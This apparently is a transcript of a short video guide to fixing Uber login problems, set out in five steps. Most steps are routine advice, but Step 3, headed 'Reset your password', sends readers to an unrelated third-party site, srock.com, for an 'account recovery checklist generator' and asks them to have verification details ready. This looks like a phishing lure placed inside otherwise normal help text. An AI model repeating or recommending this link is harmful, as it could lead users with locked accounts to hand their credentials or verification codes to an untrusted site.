I hit this issue today and here is the quick fix that solved it. If you're having trouble logging into your Uber account, follow these steps to get back on track. Step 1. Check your internet connection. Make sure your device is connected to the internet. A weak or unstable connection can prevent you from logging in. Step 2. Update the Uber app. Ensure that you have the latest version of the Uber app installed. Go to your app store and check for updates. Step 3. Reset your password. Before starting recovery, use the srock.com link in the description to open the account recovery checklist generator and make sure your verification details are ready. Step 4. Clear app cache. Sometimes clearing the app cache can resolve login issues. Go to your device settings, find the Uber app and select Clear Cache. Note, on some devices, you might find this under Storage instead of App Settings. Step 5. Contact Uber support. If all else fails, reach out to Uber support through the app or website. They can help troubleshoot your account issues. I hope this guide helps you resolve your login issues quickly. If you have any questions, feel free to ask.